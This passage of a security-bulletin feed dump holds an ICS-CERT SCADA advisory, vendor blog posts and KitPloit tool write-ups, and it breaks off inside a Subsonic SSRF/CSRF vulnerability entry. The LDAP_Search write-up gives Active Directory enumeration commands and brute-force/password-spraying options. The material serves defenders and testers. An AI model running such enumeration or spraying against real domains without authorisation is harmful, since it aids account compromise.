exit(0);\n}\n\nif(version_in_range(version:vers, test_version:\"3.9.0\", test_version2:\"3.9.25\")) {\n report = report_fixed_ver(installed_version:vers, fixed_version:\"3.9.26\", install_path:path);\n security_message(data:report, port:port);\n exit(0);\n}\n\nif(version_in_range(version:vers, test_version:\"3.8.0\", test_version2:\"3.8.27\")) {\n report = report_fixed_ver(installed_version:vers, fixed_version:\"3.8.28\", install_path:path);\n security_message(data:report, port:port);\n exit(0);\n}\n\nif(version_is_less(version:vers, test_version:\"3.7.28\")) {\n report = report_fixed_ver(installed_version:vers, fixed_version:\"3.7.28\", install_path:path);\n security_message(data:report, port:port);\n exit(0);\n}\n\nexit(99);\n", "cvss": {"score": 0.0, "vector": "NONE"}}], "ics": [{"lastseen": "2018-12-18T21:44:07", "references": ["https://twitter.com/share?url=https%3A%2F%2Fics-cert.us-cert.gov%2Fadvisories%2FICSA-18-352-02", "https://www.us-cert.gov/forms/feedback?helpful=yes&document=ICSA-18-352-02 Advantech WebAccess/SCADA&trackingNumber=&url=https://ics-cert.us-cert.gov/advisories/ICSA-18-352-02&site_name=ICS-CERT", "http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-18999", "https://cwe.mitre.org/data/definitions/20.html", "http://www.us-cert.gov/pdf/", "http://www.us-cert.gov/accessibility/", "https://ics-cert.us-cert.gov/Report-Incident?", "https://www.us-cert.gov/forms/feedback?helpful=somewhat&document=ICSA-18-352-02 Advantech WebAccess/SCADA&trackingNumber=&url=https://ics-cert.us-cert.gov/advisories/ICSA-18-352-02&site_name=ICS-CERT", "https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", "http://www.us-cert.gov/tlp/", "http://www.us-cert.gov/tlp/", "http://ics-cert.us-cert.gov", "http://ics-cert.us-cert.gov", "https://www.us-cert.gov/forms/feedback?helpful=no&document=ICSA-18-352-02 Advantech WebAccess/SCADA&trackingNumber=&url=https://ics-cert.us-cert.gov/advisories/ICSA-18-352-02&site_name=ICS-CERT", "https://ics-cert.us-cert.gov/tips/ICS-TIP-12-146-01B", "http://twitter.com/icscert", "http://twitter.com/icscert", "https://ics-cert.us-cert.gov/", "https://ics-cert.us-cert.gov/alerts/ICS-ALERT-10-301-01", "https://ics-cert.us-cert.gov/sites/default/files/recommended_practices/NCCIC_ICS-CERT_Defense_in_Depth_2016_S508C.pdf", "http://www.us-cert.gov/privacy/", "https://www.facebook.com/sharer.php?u=https%3A%2F%2Fics-cert.us-cert.gov%2Fadvisories%2FICSA-18-352-02", "https://ics-cert.us-cert.gov/content/recommended-practices", "http://www.dhs.gov", "http://www.addthis.com/bookmark.php?url=https%3A%2F%2Fics-cert.us-cert.gov%2Fadvisories%2FICSA-18-352-02", "http://www.dhs.gov/report-cyber-risks", "http://support.advantech.com/support/DownloadSRDetail_New.aspx?SR_ID=1-S9MJV&Doc_Source=Download"], "description": "## 1\\. EXECUTIVE SUMMARY\n\n * **CVSS v3 7.3**\n\n * **ATTENTION:** Exploitable remotely/low skill level to exploit\n * **Vendor: **Advantech\n * **Equipment:** WebAccess/SCADA\n * **Vulnerability:** Improper Input Validation\n\n## 2\\. RISK EVALUATION\n\nSuccessful exploitation of this vulnerability could cause a stack buffer overflow condition.\n\n## 3\\. TECHNICAL DETAILS\n\n### 3.1 AFFECTED PRODUCTS\n\nThe following versions of WebAccess/SCADA, a SCADA software platform, are affected:\n\n * WebAccess/SCADA Version 8.3.2 installed on Windows 2008 R2 SP1.\n\n### 3.2 VULNERABILITY OVERVIEW\n\n**3.2.1 [IMPROPER INPUT VALIDATION CWE-20](<https://cwe.mitre.org/data/definitions/20.html>)**\n\nLack of proper validation of user supplied input may allow an attacker to cause the overflow of a buffer on the stack. \n\n[CVE-2018-18999](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-18999>) has been assigned to this vulnerability. A CVSS v3 base score of 7.3 has been calculated; the CVSS vector string is ([AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L](<https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L>)).\n\n### 3.3 BACKGROUND\n\n * **CRITICAL INFRASTRUCTURE SECTORS: **Critical Manufacturing, Energy, Water and Wastewater Systems\n * **COUNTRIES/AREAS DEPLOYED: **East Asia, United States, Europe\n * **COMPANY HEADQUARTERS LOCATION:** Taiwan\n\n### 3.4 RESEARCHER\n\nJacob Baines of Tenable Network Security reported this vulnerability to NCCIC.\n\n## 4\\. MITIGATIONS\n\nAdvantech has released Version 8.3.4 of WebAccess/SCADA to address the reported vulnerability. Users can download the latest version of WebAccess/SCADA at the following location (registration required):\n\n[http://support.advantech.com/support/DownloadSRDetail_New.aspx?SR_ID=1-S9MJV&Doc_Source=Download](<http://support.advantech.com/support/DownloadSRDetail_New.aspx?SR_ID=1-S9MJV&Doc_Source=Download>)\n\nNCCIC recommends users take defensive measures to minimize the risk of exploitation of this vulnerability. Specifically, users should:\n\n * Minimize network exposure for all control system devices and/or systems, and ensure that they are [not accessible from the Internet](<https://ics-cert.us-cert.gov/alerts/ICS-ALERT-10-301-01>).\n * Locate control system networks and remote devices behind firewalls, and isolate them from the business network.\n * When remote access is required, use secure methods, such as Virtual Private Networks (VPNs), recognizing that VPNs may have vulnerabilities and should be updated to the most current version available. Also recognize that VPN is only as secure as the connected devices.\n\nNCCIC reminds organizations to perform proper impact analysis and risk assessment prior to deploying defensive measures. \n \nNCCIC also provides a section for [control systems security recommended practices](<https://ics-cert.us-cert.gov/content/recommended-practices>) on the ICS-CERT web page. Several recommended practices are available for reading and download, including [Improving Industrial Control Systems Cybersecurity with Defense-in-Depth Strategies](<https://ics-cert.us-cert.gov/sites/default/files/recommended_practices/NCCIC_ICS-CERT_Defense_in_Depth_2016_S508C.pdf>).\n\nAdditional mitigation guidance and recommended practices are publicly available on the [ICS-CERT website](<https://ics-cert.us-cert.gov/>) in the Technical Information Paper, [ICS-TIP-12-146-01B--Targeted Cyber Intrusion Detection and Mitigation Strategies](<https://ics-cert.us-cert.gov/tips/ICS-TIP-12-146-01B>). \n \nOrganizations observing any suspected malicious activity should follow their established internal procedures and report their findings to NCCIC for tracking and correlation against other incidents.\n\nNo known public exploits specifically target this vulnerability.\n", "edition": 1, "reporter": "Industrial Control Systems Cyber Emergency Response Team", "published": "2018-12-18T00:00:00", "title": "Advantech WebAccess/SCADA", "type": "ics", "enchantments": {}, "bulletinFamily": "info", "cvelist": ["CVE-2018-18999"], "modified": "2018-12-18T00:00:00", "id": "ICSA-18-352-02", "href": "https://ics-cert.us-cert.gov//advisories/ICSA-18-352-02", "cvss": {"score": 0.0, "vector": "NONE"}}], "malwarebytes": [{"lastseen": "2018-12-17T23:52:15", "_object_types": ["robots.models.base.Bulletin", "robots.models.rss.RssBulletin"], "references": [], "description": "Last week on Labs, we took a look at some new [Mac malware](<https://blog.malwarebytes.com/threat-analysis/2018/12/flurry-new-mac-malware-drops-december/>), a collection of various [scraped data dumps](<https://blog.malwarebytes.com/cybercrime/2018/12/data-scraping-treasure/>), the [protection of power grids](<https://blog.malwarebytes.com/security-world/business-security-world/2018/12/compromising-vital-infrastructure-power-grid/>), and how bad actors are using [SMB vulnerabilities](<https://blog.malwarebytes.com/101/2018/12/how-threat-actors-are-using-smb-vulnerabilities/>).\n\n### Other cybersecurity news\n\n * Millions affected by Facebook photo API bug: An issue granted third-party apps more [access to photos](<https://developers.facebook.com/blog/post/2018/12/14/notifying-our-developer-ecosystem-about-a-photo-api-bug/>) than should normally be granted, including images uploaded but not published. (source: Facebook)\n * Bomb threats may be a hoax: An email in circulation urging ransom payments in Bitcoin lest bombs across the US be detonated [may well be a fake](<https://www.theregister.co.uk/2018/12/14/nationwide_bitcoin_bomb_threat_a_bust/>), according to US law enforcement. (source: The Register)\n * Man jailed for fraud offenses: A man in the UK has been jailed for taking part in fraudulent activities. The main point of interest is surely the [spectacular device](<http://news.met.police.uk/news/man-jailed-for-fraud-offences-340402>) he built. (source: Met Police)\n * Another Google Plus bug: For six days, developers were able to [access profile data](<https://www.blog.google/technology/safety-security/expediting-changes-google-plus/>) not made public by the users. (source: Google)\n * Windows 10 data collection: Reddit users complained Windows 10 is [grabbing a certain kind of data](<https://www.howtogeek.com/fyi/windows-10-sends-your-activity-history-to-microsoft-even-if-you-tell-it-not-to/>) even with the setting disabled. (source: How to Geek)\n * Taylor Swift concert tracks stalkers with facial recognition software: At a recent event, cutting-edge tech was deployed to ensure the crowds were [free of potential troublemakers](<https://www.rollingstone.com/culture/culture-lists/future-entertainment-technology-music-tv-movies-760659/facial-recognition-concert-security-760696/>). (Source: Rolling Stone)\n * Password disasters of 2018: A tongue in cheek look at some of the more [spectacular password mishaps](<https://www.helpnetsecurity.com/2018/12/13/worst-password-offenders/>) seen rumbling into view this year. (Source: Help Net Security)\n * Android Trojan steals from PayPal accounts: Even with 2FA enabled, it [might not be enough](<https://www.welivesecurity.com/2018/12/11/android-trojan-steals-money-paypal-accounts-2fa/>) to keep your account balance safe. (Source: ESET)\n * Character recognition collects URLs in YouTube videos: Theoretically private data in hidden videos may [not be as private](<https://sudofox.hatenablog.com/entry/google-is-scanning-for-and-crawling-urls-in-your-private-youtube-videos>) as you\u2019d first hoped. (Source: Austin Burk\u2019s blog)\n * Traveller data left lying around on USB sticks: Border Agents aren\u2019t being [quite as careful](<https://nakedsecurity.sophos.com/2018/12/13/border-agents-are-copying-travelers-data-leaving-it-on-usb-drives/>) as they should be where potentially sensitive passenger data is concerned. (Source: Naked Security)\n\nStay safe, everyone!\n\nThe post [A week in security (December 10 \u2013 16)](<https://blog.malwarebytes.com/security-world/2018/12/week-security-december-10-16/>) appeared first on [Malwarebytes Labs](<https://blog.malwarebytes.com>).", "reporter": "Malwarebytes Labs", "published": "2018-12-17T17:58:31", "type": "malwarebytes", "title": "A week in security (December 10 \u2013 16)", "enchantments": {}, "bulletinFamily": "blog", "cvelist": [], "_object_type": "robots.models.rss.RssBulletin", "modified": "2018-12-17T17:58:31", "id": "MALWAREBYTES:DA6E52CED2475E8D79A3BB77D06EA0DC", "href": "https://blog.malwarebytes.com/security-world/2018/12/week-security-december-10-16/", "cvss": {"score": 0.0, "vector": "NONE"}}], "mssecure": [{"lastseen": "2018-12-17T17:25:26", "_object_types": ["robots.models.base.Bulletin", "robots.models.rss.RssBulletin"], "references": [], "description": "_This series outlines the most fundamental steps you can take with your investment in Microsoft 365 security solutions. We will provide advice on activities such as setting up identity management through active directory, malware protection, and more. In this post, we explain how to enable single sign-on (SSO) in Azure Active Directory (Azure AD) to manage authentication across devices, cloud apps, and on-premises apps, and then how to set up Multi-Factor Authentication (MFA) to authenticate user sign-ins through a mobile app, phone call, or SMS._\n\nBalancing employee productivity needs with enterprise security begins with protecting identities. Gone are the days when users accessed corporate resources behind a firewall using corporate-issued devices. Your employees and partners use multiple devices and apps for work. They share documents with other users via cloud productivity apps and email, and they switch between personal and work-related apps and devices throughout the day. This has created a world of opportunity for sophisticated cybercriminals.\n\nHackers know that users often use the same weak password for all their accounts. Sophisticated cybercriminals employ several tactics to take advantage of these vulnerabilities. Password spray is a method of trying common passwords against known account lists. In a breach relay, a malicious actor steals a password from one organization and then uses the password to try to access other networks. Phishing campaigns trick users into handing over the password directly to the hacker. Azure AD provides several features to reduce the likelihood of all three of these attack methods.\n\n> Access credentials in the form of email addresses and passwords are the two most compromised data typesat 44.3 percent and 40 percent, respectively. \n**Source**: [Dark Reading](<https://www.darkreading.com/vulnerabilities---threats/data-breach-record-exposure-up-305--from-2016/d/d-id/1330359>) **Date**: November 2017\n\n## Simplify user access with Azure AD single sign-on\n\nMost enterprise security breaches begin with a compromised user account that makes protecting those accounts a critical priority. If you manage a hybrid environment, the first step is to create a single common identity for all your users. We [recommend password hash sync as your primary authentication method](<https://docs.microsoft.com/en-us/azure/security/azure-ad-choose-authn>) if possible. If you use federation services to authenticate users, be sure to enable [extranet lockout](<https://docs.microsoft.com/en-us/azure/security/azure-ad-choose-authn>). You can read about these and other hybrid identity security recommendations in the first blog in this series: [Step 1. Identify users: top 10 actions to secure your environment](<https://cloudblogs.microsoft.com/microsoftsecure/2018/12/05/step-1-identify-users-top-10-actions-to-secure-your-environment/>).\n\nOne huge advantage of a hybrid deployment is that you can set up SSO. Users already sign in to on-premises resources using a username and password they know. [Azure AD SSO](<https://docs.microsoft.com/en-us/azure/active-directory/manage-apps/configure-single-sign-on-portal>) lets them use the same set of credentials to access on-premises resources plus Office 365 apps. You can then increase productivity further by extending SSO to include more cloud SaaS and on-premises apps through [AppProxy](<https://docs.microsoft.com/en-us/azure/active-directory/manage-apps/application-proxy>). Cloud-only customers gain the same productivity benefits by setting up SSO across Azure AD, Office 365, and Azure AD-connected cloud applications.\n\nYou can use the [SSO deployment plan](<https://aka.ms/SSODPDownload>) as a step-by-step guide to walk you through the implementation process of adding more apps to your SSO solution.\n\n## Strengthen your credentials\n\nGiven the frequency with which credentials are stolen, guessed, or phished, both cloud and hybrid customers should [enable Azure MFA](<https://docs.microsoft.com/en-us/azure/active-directory/authentication/concept-mfa-howitworks>) to add another layer of security to their accounts (Figure 1). MFA protects everything under the SSO identity system, including cloud SaaS and on-premises apps published with AppProxy, significantly decreasing the odds that a compromised identity will result in a security breach.\n\nMFA works by requiring two or more of the following authentication methods:\n\n * Something you know (typically a password).\n * Something you have (a trusted device that is not easily duplicated, like a phone).\n * Something you are (biometrics).\n\nYou can use the [MFA deployment plan](<https://aka.ms/MFADPDownload>) as a step-by-step guide to walk you through the implementation process.\n\n\n\n_Figure 1. MFA works by requiring two or more authentication methods._\n\nOne of the reasons users select weak or common passwords is because lengthy passwords that require numbers, letters, and special characters are difficult to remember, especially if they must be changed every few months. [Microsoft recommends that you disable these rules, and instead prohibit users from choosing common passwords](<https://docs.microsoft.com/en-us/azure/security/azure-ad-secure-steps>). If you are a hybrid customer, you will need to deploy Azure AD password protection agents on-premises to enable this feature. [Azure AD password protection](<https://docs.microsoft.com/en-us/azure/active-directory/authentication/concept-password-ban-bad>) blocks users from choosing common passwords and any custom passwords that you configure. If you implement password hash synchronization as a primary or backup authentication method, you will have access to a leaked user credentials report, which provides usernames and password pairs that have been leaked to the dark web.\n\nBetter yet, move away from passwords entirely. One of the reasons passwords are frequently stolen is that they work from anywhere. [Windows Hello](<https://docs.microsoft.com/en-us/windows/security/identity-protection/hello-for-business/hello-identity-verification>) allows users to set up device authentication using either a PIN or biometrics, such as a fingerprint scanner or face recognition. This form of authentication is easier for users because they dont have to remember complex passwords, but it is also safer because the authentication method is tied to the device. A hacker would have to gain possession of the device and the biometrics or PIN to compromise your network.\n\n## Enable productivity with self-service\n\nThe Azure self-service portal allows you to turn over common tasks to your users, saving your help desk time without increasing your risks. [Azure AD self-service password reset (SSPR)](<https://docs.microsoft.com/en-us/azure/active-directory/authentication/quickstart-sspr>) offers a simple means for users to reset their passwords or unlock accounts without administrator intervention. You can also give users the ability to manage groups using Azure AD security groups and Office 365 groups. Known as [self-service group management](<https://docs.microsoft.com/azure/active-directory/active-directory-accessmanagement-self-service-group-management>), this feature allows group owners who are not assigned an administrative role to create and manage groups without relying on administrators to handle their requests. Letting users reset their own passwords and manage groups gets them back to productive work quickly while reducing your tech support costs.\n\nYou can use the [SSPR deployment plan](<https://aka.ms/SSPRDPDownload>) as a step-by-step guide to walk you through the implementation process.\n\nIn future blog posts, we will provide additional Azure AD configuration recommendations to help secure your identities. We will then touch on the recommended security best practices to protect your apps, devices, and infrastructure.\n\n### **Learn more**\n\nCheck back in a few weeks for our next blog post: Step 3. Protect your identities. In this post, well dive into additional protections you can apply to your identities to ensure that only authorized people access the appropriate data and apps.\n\n### **Get deployment help now**\n\nFastTrack for Microsoft 365 provides end-to-end guidance to set up your security products. FastTrack is a deployment and adoption service that comes at no charge with your subscription. [Get started at FastTrack for Microsoft 365](<https://www.microsoft.com/en-us/fasttrack/microsoft-365/security>).\n\n### **Resources**\n\n * [Top 10 Security Deployment Actions with Microsoft 365 Infographic](<https://query.prod.cms.rt.microsoft.com/cms/api/am/binary/RE2wYd3>)\n * [Azure AD deployment plans](<https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/active-directory-deployment-plans>)\n * [Deployment series](<https://cloudblogs.microsoft.com/microsoftsecure/?content-type=deployment-series>)\n\nThe post [Step 2. Manage authentication and safeguard access: top 10 actions to secure your environment](<https://cloudblogs.microsoft.com/microsoftsecure/2018/12/17/step-2-manage-authentication-and-safeguard-access-top-10-actions-to-secure-your-environment/>) appeared first on [Microsoft Secure](<https://cloudblogs.microsoft.com/microsoftsecure>).", "reporter": "Debbie Seres", "published": "2018-12-17T17:00:23", "type": "mssecure", "title": "Step 2. Manage authentication and safeguard access: top 10 actions to secure your environment", "enchantments": {}, "bulletinFamily": "blog", "cvelist": [], "_object_type": "robots.models.rss.RssBulletin", "modified": "2018-12-17T17:00:23", "id": "MSSECURE:C1D26161CA1224265BF01013B996004A", "href": "https://cloudblogs.microsoft.com/microsoftsecure/2018/12/17/step-2-manage-authentication-and-safeguard-access-top-10-actions-to-secure-your-environment/", "cvss": {"score": 0.0, "vector": "NONE"}}], "kitploit": [{"lastseen": "2018-12-17T16:52:41", "references": ["https://github.com/abdulgaphy/r3con1z3r"], "description": "[  ](<https://2.bp.blogspot.com/-U3_HIQb9ZaI/XBKvXv3jLlI/AAAAAAAANhk/QInhNmL0NtMHjekRpfJgQoZdwYv05UFIQCLcBGAs/s1600/r3con1z3r_1_reconizer.png>)\n\n \n\n\nR3con1z3r is a lightweight Web [ information gathering ](<https://www.kitploit.com/search/label/Information%20Gathering>) tool with an intuitive features written in python. it provides a powerful environment in which open source [ intelligence ](<https://www.kitploit.com/search/label/Intelligence>) (OSINT) web-based [ footprinting ](<https://www.kitploit.com/search/label/Footprinting>) can be conducted quickly and thoroughly. \n\nFootprinting is the first phase of ethical hacking, its the collection of every possible information regarding the target. R3con1z3r is a passive [ reconnaissance ](<https://www.kitploit.com/search/label/Reconnaissance>) tool with built-in functionalities which includes: HTTP header flag, Traceroute, Whois Footprinting, DNS information, Site on same server, Nmap port scanner, Reverse Target and hyperlinks on a webpage. The tool, after being provided with necessary inputs generates an output in HTML format. \n\n \n** Screenshots ** \n \n\n\n[  ](<https://2.bp.blogspot.com/-U3_HIQb9ZaI/XBKvXv3jLlI/AAAAAAAANhk/QInhNmL0NtMHjekRpfJgQoZdwYv05UFIQCLcBGAs/s1600/r3con1z3r_1_reconizer.png>)\n\n \n\n\n[  ](<https://3.bp.blogspot.com/-Gj0U1R2ZiFc/XBKvY-SsEAI/AAAAAAAANho/lkJx2rPZsz45F5GMOalG-CDaZodKaxf9QCLcBGAs/s1600/r3con1z3r_2_recon.png>)\n\n \n** Installation ** \nr3con1z3r supports ** Python 2 ** and ** Python 3 ** . \n\n \n \n $ git clone https://github.com/abdulgaphy/r3con1z3r.git\n $ cd r3con1z3r\n $ pip install -r requirements.txt\n\n** Optional for Linux users ** \n\n \n \n $ sudo chmod +x r3con1z3r.py\n\n \n** Moduldes ** \nr3con1z3r depends only on the sys and the requests python modules. \n** Python 3: ** ` $ pip3 install -r requirements.txt ` \n** For Coloring on Windows: ** ` pip install win_unicode_console colorama ` \n \n** Usage ** \npython3 r3con1z3r.py [domain.com] \n \n** Examples ** \n\n\n * To run on all Operating Systems (Linux, Windows, Mac OS X, Android e.t.c) i.e Python 2 environment \n` python r3con1z3r.py google.com ` \n\n\n * To run on python3 environment: \n` python3 r3con1z3r.py facebook.com ` \n\n\n * To run as executable Unix only \n` ./r3con1z3r.py google.com ` \n \n \n\n\n** [ Download R3Con1Z3R ](<https://github.com/abdulgaphy/r3con1z3r>) **\n", "edition": 1, "reporter": "KitPloit", "published": "2018-12-17T12:12:01", "title": "R3Con1Z3R - A Lightweight Web Information Gathering Tool With An Intuitive Features (OSINT)", "type": "kitploit", "enchantments": {}, "bulletinFamily": "tools", "cvelist": [], "modified": "2018-12-17T12:12:01", "toolHref": "https://github.com/abdulgaphy/r3con1z3r", "id": "KITPLOIT:7720783368216932128", "href": "http://www.kitploit.com/2018/12/r3con1z3r-lightweight-web-information.html", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-12-16T16:50:16", "references": ["https://github.com/SecureAuthCorp/impacket/tree/python36", "https://github.com/m8r0wn/ldap_search"], "description": "[  ](<https://4.bp.blogspot.com/-YzvH4FXJv40/XBJ5C8SIWNI/AAAAAAAANf8/8YJNvhBdfK8qTV9Ci2jXBK0DHoafZMfJQCLcBGAs/s1600/LDAP_Search.png>)\n\n \n\n\nLDAP_Search can be used to enumerate Users, Groups, and Computers on a [ Windows ](<https://www.kitploit.com/search/label/Windows>) Domain. Authentication can be performed using traditional username and password, or [ NTLM ](<https://www.kitploit.com/search/label/NTLM>) hash. In addition, this tool has been modified to allow brute force/password-spraying via LDAP. Ldap_Search makes use of [ Impackets ](<https://github.com/SecureAuthCorp/impacket/tree/python36>) python36 branch to perform the main operations. (These are the guys that did the real heavy lifting and deserve the credit!) \n\n \n** Installation ** \n\n \n \n git clone --recursive https://github.com/m8r0wn/ldap_search\n cd ldap_search\n sudo chmod +x setup.sh\n sudo ./setup.sh\n\n \n** Usage ** \nEnumerate all active users on a domain: \n\n \n \n python3 ldap_search.py users -u user1 -p Password1 -d demo.local\n\nLookup a single user and display field headings: \n\n \n \n python3 ldap_search.py users -q AdminUser -u user1 -p Password1 -d demo.local\n\nEnumerate all computers on a domain: \n\n \n \n python3 ldap_search.py computers -u user1 -p Password1 -d demo.local\n\nSearch for end of life systems on the domain: \n\n \n \n python3 ldap_search.py computers -q eol -u user1 -p Password1 -d demo.local -s DC01.demo.local\n\nEnumerate all groups on the domain: \n\n \n \n python3 ldap_search.py groups -u user1 -p Password1 -d demo.local -s 192.168.1.1\n\nQuery group members: \n\n \n \n python3 ldap_search.py groups -q \"Domain Admins\" -u user1 -p Password1 -d demo.local\n\n \n** Queries ** \nBelow are the query options that can be specified using the \"-q\" argument: \n\n \n \n User\n active / [None] - All active users (Default)\n all - All users, even disabled\n [specific account or email] - lookup user, ex. \"m8r0wn\"\n \n group\n [None] - All domain groups\n [Specific group name] - lookup group members, ex. \"Domain Admins\"\n \n computer\n [None] - All Domain Computers\n eol - look for all end of life systems on domain\n\n \n** Options ** \n\n \n \n positional arguments:\n lookup_type Lookup Types: user, group, computer\n \n optional arguments:\n -q QUERY Specify user or group to query or use eol.\n -u USER Single username\n -U USER Users.txt file\n -p PASSWD Single password\n -P PASSWD Password.txt file\n -H HASH Use Hash for Authentication\n -d DOMAIN Domain (Ex. demo.local)\n -s SRV, -srv SRV LDAP Server (optional)\n -t TIMEOUT Connection Timeout (Default: 4)\n -v Show Search Result Attribute Names\n -vv Show Failed Logins & Errors\n\n \n \n\n\n** [ Download Ldap_Search ](<https://github.com/m8r0wn/ldap_search>) **\n", "edition": 1, "reporter": "KitPloit", "published": "2018-12-16T12:34:08", "title": "LDAP_Search - Tool To Perform LDAP Queries And Enumerate Users, Groups, And Computers From Windows Domains", "type": "kitploit", "enchantments": {}, "bulletinFamily": "tools", "cvelist": [], "modified": "2018-12-16T12:34:08", "toolHref": "https://github.com/m8r0wn/ldap_search", "id": "KITPLOIT:1883515606576503723", "href": "http://www.kitploit.com/2018/12/ldapsearch-tool-to-perform-ldap-queries.html", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-12-15T16:49:43", "references": ["https://github.com/felixweyne/imaginaryC2/blob/master/media/imaginary_c2_trickbot_simulation.mp4?raw=true", "https://github.com/felixweyne/imaginaryC2"], "description": "[  ](<https://2.bp.blogspot.com/-6Ol9HrWGTTU/XBJ9elOyLZI/AAAAAAAANgc/pQbA_cH7AHkl5ct7IVeyN98TB4kaMFKoQCLcBGAs/s1600/imaginaryC2_1_imaginary_c2.png>)\n\n \n\n\n_ author: _ Felix Weyne ( [ website ](<https://www.uperesia.com/>) ) ( [ Twitter ](<https://twitter.com/felixw3000>) ) \n\n \n\n\nImaginary C2 is a python tool which aims to help in the behavioral (network) [ analysis ](<https://www.kitploit.com/search/label/Analysis>) of malware. \n\nImaginary C2 hosts a HTTP server which captures HTTP requests towards selectively chosen domains/IPs. Additionally, the tool aims to make it easy to replay captured Command-and-Control responses/served payloads. \n\n \n\n\nBy using this tool, an analyst can feed the [ malware ](<https://www.kitploit.com/search/label/Malware>) consistent network responses (e.g. C&C instructions for the malware to execute). Additionally, the analyst can [ capture ](<https://www.kitploit.com/search/label/Capture>) and inspect HTTP requests towards a domain/IP which is off-line at the time of the analysis. \n\n \n\n\n** Replay packet captures **\n\nImaginary C2 provides two scripts to convert _ packet captures (PCAPs) _ or _ Fiddler Session Archives _ into ** request definitions ** which can be parsed by imaginary C2. Via these scripts the user can extract HTTP request URLs and domains, as well as HTTP responses. This way, one can quickly replay HTTP responses for a given HTTP request. \n\n \n\n\n** Technical details ** \n** requirements ** : Imaginary C2 requires Python 2.7 and Windows. \n** modules: ** Currently, Imaginary C2 contains three modules and two configuration files: \nFilename | Function \n---|--- \n1\\. imaginary_c2.py | Hosts python's simple HTTP server. Main module. \n2\\. redirect_to_imaginary_c2.py | Alters Windows' host file and Windows' (IP) Routing Table. \n3\\. unpack_fiddler_archive.py & unpack_pcap.py | Extracts HTTP responses from packet captures. Adds corresponding HTTP request domains and URLs to the configuration files. \n4\\. redirect_config.txt | Contains domains and IPs which needs to be redirected to localhost (to the python HTTP server). \n5\\. requests_config.txt | Contains URL path definitions with the corresponding data sources. \n** request definitions ** : Each (HTTP) request defined in the request configuration consists of two parameters: \nParameter 1: _ HTTP request URL path _ (a.k.a. urlType) \nValue | Meaning \n---|--- \nfixed | Define the URL path as a literal string \nregex | Define a regex pattern to be matched on the URL path \nParameter 2: _ HTTP response source _ (a.k.a. sourceType) \nValue | Meaning \n---|--- \ndata | Imaginary C2 will respond with the contents of a file on disk \npython | Imaginary C2 will run a python script. The output of the python script defines the HTTP response. \n \n** Demo use case: Simulating TrickBot servers ** \nImaginary C2 can be used to simulate the hosting of TrickBot components and configuration files. Additionally, it can also be used to simulate TrickBot's web [ injection ](<https://www.kitploit.com/search/label/Injection>) servers. \n \n** How it works: ** \nUpon execution, the TrickBot downloader connects to a set of hardcoded IPs to fetch a few configuration files. One of these configuration files contains the locations (IP addresses) of the TrickBot plugin servers. The Trickbot downloader downloads the plugins (modules) from these servers and decrypts them. The decrypted modules are then injected into a _ svchost.exe _ instance. \n \n\n\n[  ](<https://4.bp.blogspot.com/-q9w1vebIfys/XBJ9nJzSHQI/AAAAAAAANgg/TZjB9TH-7NYudY7hjJTPWDBbD7Wy2GkKQCLcBGAs/s1600/imaginaryC2_2.png>)\n\n \nOne of TrickBot's plugins is called _ injectdll _ , a plugin which is responsible for TrickBot's webinjects. The _ injectdll _ plugin regularly fetches an updated set of webinject configurations. For each targeted (banking) website in the configuration, the address of a _ webfake server _ is defined. When a victim browses to a (banking) website which is targeted by TrickBot, his browser secretly gets redirected to the _ webfake server _ . The _ webfake server _ hosts a replica of the targeted website. This replica website usually is used in a social-engineering attack to defraud the victim. \n \n** Imaginary C2 in action: ** \nThe below video shows the TrickBot downloader running inside _ svchost.exe _ and connecting to imaginary C2 to download two modules. Each downloaded module gets injected into a newly spawned _ svchost.exe _ instance. The webinject module tries to steal the browser's saved [ passwords ](<https://www.kitploit.com/search/label/Passwords>) and exfiltrates the stolen passwords to the TrickBot server. Upon visiting a targeted banking website, TrickBot redirects the browser to the _ webfake server _ . In the demo, the _ webfake server _ hosts the message: \"Default imaginary C2 server response\" [ (full video) ](<https://github.com/felixweyne/imaginaryC2/blob/master/media/imaginary_c2_trickbot_simulation.mp4?raw=true>) . \n \n\n\n[  ](<https://1.bp.blogspot.com/-KTOPkIMEhXA/XBJ9wmyhmhI/AAAAAAAANgo/ldK17jR1AaIv8R67WbSncYXRckPg1kExQCLcBGAs/s1600/imaginaryC2_3.gif>)\n\n \n \n\n\n** [ Download imaginaryC2 ](<https://github.com/felixweyne/imaginaryC2>) **\n", "edition": 1, "reporter": "KitPloit", "published": "2018-12-15T12:08:04", "title": "imaginaryC2 - Tool Which Aims To Help In The Behavioral (Network) Analysis Of Malware", "type": "kitploit", "enchantments": {}, "bulletinFamily": "tools", "cvelist": [], "modified": "2018-12-15T12:08:04", "toolHref": "https://github.com/felixweyne/imaginaryC2", "id": "KITPLOIT:317075075265553278", "href": "http://www.kitploit.com/2018/12/imaginaryc2-tool-which-aims-to-help-in.html", "cvss": {"score": 0.0, "vector": "NONE"}}], "vulnerlab": [{"lastseen": "2018-12-17T03:15:02", "references": [], "description": "", "edition": 1, "reporter": "S.AbenMassaoud [research@vulnerability-lab.com] - https://www.vulnerability-lab.com/show.php?user=S.AbenMassaoud", "published": "2018-12-17T00:00:00", "title": "Subsonic v6.1.5 - Server Side Request Forgery & CSRF", "type": "vulnerlab", "enchantments": {}, "bulletinFamily": "exploit", "cvelist": [], "modified": "2018-12-17T00:00:00", "id": "VULNERLAB:2175", "href": "http://www.vulnerability-lab.com/get_content.php?id=2175", "sourceData": "Document Title:\r\n===============\r\nSubsonic v6.1.5 - Server Side Request Forgery & CSRF\r\n\r\n\r\nReferences (Source):\r\n====================\r\nhttps://www.vulnerability-lab.com/get_content.php?id=2175\r\n\r\n\r\nRelease Date:\r\n=============\r\n2018-12-17\r\n\r\n\r\nVulnerability Laboratory ID (VL-ID):\r\n====================================\r\n2175\r\n\r\n\r\nCommon Vulnerability Scoring System:\r\n====================================\r\n4.1\r\n\r\n\r\nVulnerability Class:\r\n====================\r\nServer Side Request Forgery\r\n\r\n\r\nCurrent Estimated Price:\r\n========================\r\n500\u20ac - 